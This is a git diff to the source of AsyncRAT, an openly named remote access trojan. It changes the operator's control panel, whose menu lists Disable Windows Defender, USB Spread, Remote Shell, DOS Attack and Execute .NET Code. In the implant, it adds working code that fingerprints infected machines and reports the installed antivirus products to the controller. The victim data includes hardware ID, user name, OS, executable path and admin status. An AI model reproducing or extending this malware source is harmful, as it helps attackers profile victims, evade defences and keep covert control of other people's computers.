diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs index 533c3d7..5728434 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs @@ -59,10 +59,10 @@ this.disableWindowsDefenderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.botsKillerToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.uSBSpreadToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); - this.executeNETCodeToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.seedTorrentToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.remoteShellToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.dOSAttackToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.executeNETCodeToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.extraToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.visitWebsiteToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.sendMessageBoxToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); @@ -114,6 +114,7 @@ this.performanceCounter2 = new System.Diagnostics.PerformanceCounter(); this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components); this.TimerTask = new System.Windows.Forms.Timer(this.components); + this.lv_av = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.contextMenuClient.SuspendLayout(); this.statusStrip1.SuspendLayout(); this.tabControl1.SuspendLayout(); @@ -139,7 +140,8 @@ this.lv_os, this.lv_version, this.lv_prefor, - this.lv_admin}); + this.lv_admin, + this.lv_av}); this.listView1.ContextMenuStrip = this.contextMenuClient; this.listView1.Dock = System.Windows.Forms.DockStyle.Fill; this.listView1.FullRowSelect = true; @@ -148,7 +150,7 @@ this.listView1.Name = "listView1"; this.listView1.ShowGroups = false; this.listView1.ShowItemToolTips = true; - this.listView1.Size = new System.Drawing.Size(1154, 394); + this.listView1.Size = new System.Drawing.Size(1320, 440); this.listView1.TabIndex = 0; this.listView1.UseCompatibleStateImageBehavior = false; this.listView1.View = System.Windows.Forms.View.Details; @@ -210,20 +212,20 @@ this.toolStripSeparator1, this.bUILDERToolStripMenuItem}); this.contextMenuClient.Name = "contextMenuStrip1"; - this.contextMenuClient.Size = new System.Drawing.Size(245, 273); + this.contextMenuClient.Size = new System.Drawing.Size(199, 240); // // aBOUTToolStripMenuItem // this.aBOUTToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.info; this.aBOUTToolStripMenuItem.Name = "aBOUTToolStripMenuItem"; - this.aBOUTToolStripMenuItem.Size = new System.Drawing.Size(244, 32); + this.aBOUTToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.aBOUTToolStripMenuItem.Text = "ABOUT"; this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click); // // toolStripSeparator2 // this.toolStripSeparator2.Name = "toolStripSeparator2"; - this.toolStripSeparator2.Size = new System.Drawing.Size(241, 6); + this.toolStripSeparator2.Size = new System.Drawing.Size(195, 6); // // sENDFILEToolStripMenuItem // @@ -232,7 +234,7 @@ this.tODISKToolStripMenuItem}); this.sENDFILEToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.tomem; this.sENDFILEToolStripMenuItem.Name = "sENDFILEToolStripMenuItem"; - this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(244, 32); + this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.sENDFILEToolStripMenuItem.Text = "Send File"; // // tOMEMORYToolStripMenuItem @@ -260,7 +262,7 @@ this.reportWindowToolStripMenuItem}); this.monitoringToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.monitoring_system; this.monitoringToolStripMenuItem.Name = "monitoringToolStripMenuItem"; - this.monitoringToolStripMenuItem.Size = new System.Drawing.Size(244, 32); + this.monitoringToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.monitoringToolStripMenuItem.Text = "Monitoring"; // // remoteDesktopToolStripMenuItem1 @@ -340,7 +342,7 @@ this.executeNETCodeToolStripMenuItem}); this.miscellaneousToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.Miscellaneous; this.miscellaneousToolStripMenuItem.Name = "miscellaneousToolStripMenuItem"; - this.miscellaneousToolStripMenuItem.Size = new System.Drawing.Size(244, 32); + this.miscellaneousToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.miscellaneousToolStripMenuItem.Text = "Miscellaneous"; // // getAdminPrivilegesToolStripMenuItem @@ -375,14 +377,6 @@ this.uSBSpreadToolStripMenuItem1.Text = "USB Spread"; this.uSBSpreadToolStripMenuItem1.Click += new System.EventHandler(this.USBSpreadToolStripMenuItem1_Click); // - // executeNETCodeToolStripMenuItem - // - this.executeNETCodeToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.coding; - this.executeNETCodeToolStripMenuItem.Name = "executeNETCodeToolStripMenuItem"; - this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(329, 34); - this.executeNETCodeToolStripMenuItem.Text = "Execute .NET Code"; - this.executeNETCodeToolStripMenuItem.Click += new System.EventHandler(this.ExecuteNETCodeToolStripMenuItem_Click_1); - // // seedTorrentToolStripMenuItem1 // this.seedTorrentToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.u_torrent_logo; @@ -407,6 +401,14 @@ this.dOSAttackToolStripMenuItem.Text = "DOS Attack"; this.dOSAttackToolStripMenuItem.Click += new System.EventHandler(this.DOSAttackToolStripMenuItem_Click_1); // + // executeNETCodeToolStripMenuItem + // + this.executeNETCodeToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.coding; + this.executeNETCodeToolStripMenuItem.Name = "executeNETCodeToolStripMenuItem"; + this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(329, 34); + this.executeNETCodeToolStripMenuItem.Text = "Execute .NET Code"; + this.executeNETCodeToolStripMenuItem.Click += new System.EventHandler(this.ExecuteNETCodeToolStripMenuItem_Click_1); + // // extraToolStripMenuItem // this.extraToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { @@ -415,14 +417,14 @@ this.chatToolStripMenuItem1}); this.extraToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.extra; this.extraToolStripMenuItem.Name = "extraToolStripMenuItem"; - this.extraToolStripMenuItem.Size = new System.Drawing.Size(244, 32); + this.extraToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.extraToolStripMenuItem.Text = "Extra"; // // visitWebsiteToolStripMenuItem1 // this.visitWebsiteToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.visit; this.visitWebsiteToolStripMenuItem1.Name = "visitWebsiteToolStripMenuItem1"; - this.visitWebsiteToolStripMenuItem1.Size = new System.Drawing.Size(270, 34); + this.visitWebsiteToolStripMenuItem1.Size = new System.Drawing.Size(258, 34); this.visitWebsiteToolStripMenuItem1.Text = "Visit Website"; this.visitWebsiteToolStripMenuItem1.Click += new System.EventHandler(this.VisitWebsiteToolStripMenuItem1_Click); // @@ -430,7 +432,7 @@ // this.sendMessageBoxToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.msgbox; this.sendMessageBoxToolStripMenuItem1.Name = "sendMessageBoxToolStripMenuItem1"; - this.sendMessageBoxToolStripMenuItem1.Size = new System.Drawing.Size(270, 34); + this.sendMessageBoxToolStripMenuItem1.Size = new System.Drawing.Size(258, 34); this.sendMessageBoxToolStripMenuItem1.Text = "Send MessageBox"; this.sendMessageBoxToolStripMenuItem1.Click += new System.EventHandler(this.SendMessageBoxToolStripMenuItem1_Click); // @@ -438,7 +440,7 @@ // this.chatToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.chat; this.chatToolStripMenuItem1.Name = "chatToolStripMenuItem1"; - this.chatToolStripMenuItem1.Size = new System.Drawing.Size(270, 34); + this.chatToolStripMenuItem1.Size = new System.Drawing.Size(258, 34); this.chatToolStripMenuItem1.Text = "Chat"; this.chatToolStripMenuItem1.Click += new System.EventHandler(this.ChatToolStripMenuItem1_Click); // @@ -449,7 +451,7 @@ this.pCToolStripMenuItem}); this.systemToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.system; this.systemToolStripMenuItem.Name = "systemToolStripMenuItem"; - this.systemToolStripMenuItem.Size = new System.Drawing.Size(244, 32); + this.systemToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.systemToolStripMenuItem.Text = "System"; // // clientToolStripMenuItem @@ -541,13 +543,13 @@ // toolStripSeparator1 // this.toolStripSeparator1.Name = "toolStripSeparator1"; - this.toolStripSeparator1.Size = new System.Drawing.Size(241, 6); + this.toolStripSeparator1.Size = new System.Drawing.Size(195, 6); // // bUILDERToolStripMenuItem // this.bUILDERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.builder; this.bUILDERToolStripMenuItem.Name = "bUILDERToolStripMenuItem"; - this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(244, 32); + this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(198, 32); this.bUILDERToolStripMenuItem.Text = "BUILDER"; this.bUILDERToolStripMenuItem.Click += new System.EventHandler(this.bUILDERToolStripMenuItem_Click); // @@ -557,9 +559,9 @@ this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { this.toolStripStatusLabel1, this.toolStripStatusLabel2}); - this.statusStrip1.Location = new System.Drawing.Point(0, 433); + this.statusStrip1.Location = new System.Drawing.Point(0, 479); this.statusStrip1.Name = "statusStrip1"; - this.statusStrip1.Size = new System.Drawing.Size(1168, 32); + this.statusStrip1.Size = new System.Drawing.Size(1334, 32); this.statusStrip1.TabIndex = 1; this.statusStrip1.Text = "statusStrip1"; // @@ -598,7 +600,7 @@ this.tabControl1.Location = new System.Drawing.Point(0, 0); this.tabControl1.Name = "tabControl1"; this.tabControl1.SelectedIndex = 0; - this.tabControl1.Size = new System.Drawing.Size(1168, 433); + this.tabControl1.Size = new System.Drawing.Size(1334, 479); this.tabControl1.SizeMode = System.Windows.Forms.TabSizeMode.Fixed; this.tabControl1.TabIndex = 2; // @@ -608,7 +610,7 @@ this.tabPage1.Location = new System.Drawing.Point(4, 29); this.tabPage1.Name = "tabPage1"; this.tabPage1.Padding = new System.Windows.Forms.Padding(3); - this.tabPage1.Size = new System.Drawing.Size(1160, 400); + this.tabPage1.Size = new System.Drawing.Size(1326, 446); this.tabPage1.TabIndex = 0; this.tabPage1.Text = "Clients"; // @@ -828,11 +830,16 @@ this.TimerTask.Interval = 5000; this.TimerTask.Tick += new System.EventHandler(this.TimerTask_Tick); // + // lv_av + // + this.lv_av.Text = "ANTI-VIRUS"; + this.lv_av.Width = 136; + // // Form1 // this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; - this.ClientSize = new System.Drawing.Size(1168, 465); + this.ClientSize = new System.Drawing.Size(1334, 511); this.Controls.Add(this.tabControl1); this.Controls.Add(this.statusStrip1); this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); @@ -946,6 +953,7 @@ private System.Windows.Forms.ToolStripMenuItem dOSAttackToolStripMenuItem; private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel2; private System.Windows.Forms.ToolStripMenuItem executeNETCodeToolStripMenuItem; + private System.Windows.Forms.ColumnHeader lv_av; } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs index 7a504a6..eb094e8 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs @@ -33,6 +33,7 @@ namespace AsyncRAT_Sharp.Handle_Packet client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString); + client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Antivirus").AsString); client.LV.ToolTipText = "[Path] " + unpack_msgpack.ForcePathObject("Path").AsString + Environment.NewLine; client.LV.ToolTipText += "[Pastebin] " + unpack_msgpack.ForcePathObject("Pastebin").AsString; diff --git a/AsyncRAT-C#/Client/Helper/Methods.cs b/AsyncRAT-C#/Client/Helper/Methods.cs index c86c683..6afee21 100644 --- a/AsyncRAT-C#/Client/Helper/Methods.cs +++ b/AsyncRAT-C#/Client/Helper/Methods.cs @@ -1,6 +1,11 @@ -using Client.Sockets; +using Client.MessagePack; +using Client.Sockets; +using Microsoft.VisualBasic.Devices; using System; +using System.Collections.Generic; +using System.Diagnostics; using System.IO; +using System.Management; using System.Net.Sockets; using System.Security.Cryptography; using System.Security.Principal; @@ -11,6 +16,9 @@ namespace Client.Helper { static class Methods { + public static PerformanceCounter TheCPUCounter { get; } = new PerformanceCounter("Processor", "% Processor Time", "_Total"); + public static PerformanceCounter TheMemCounter { get; } = new PerformanceCounter("Memory", "% Committed Bytes In Use"); + public static string HWID() { StringBuilder sb = new StringBuilder(); @@ -66,5 +74,37 @@ namespace Client.Helper } catch { } } + + public static string Antivirus() + { + using (ManagementObjectSearcher antiVirusSearch = new ManagementObjectSearcher(@"\\" + Environment.MachineName + @"\root\SecurityCenter2", "Select * from AntivirusProduct")) + { + List av = new List(); + foreach (ManagementBaseObject searchResult in antiVirusSearch.Get()) + { + av.Add(searchResult["displayName"].ToString()); + } + if (av.Count == 0) return "None"; + return string.Join(", ", av.ToArray()); + } + } + + public static byte[] SendInfo() + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "ClientInfo"; + msgpack.ForcePathObject("HWID").AsString = HWID(); + msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString(); + msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString().Replace("Microsoft", null) + " " + + Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit"); + msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName; + msgpack.ForcePathObject("Version").AsString = Settings.Version; + msgpack.ForcePathObject("Admin").AsString = IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User"); + TheCPUCounter.NextValue(); + msgpack.ForcePathObject("Performance").AsString = $"CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%"; + msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin; + msgpack.ForcePathObject("Antivirus").AsString = Antivirus(); + return msgpack.Encode2Bytes(); + } } }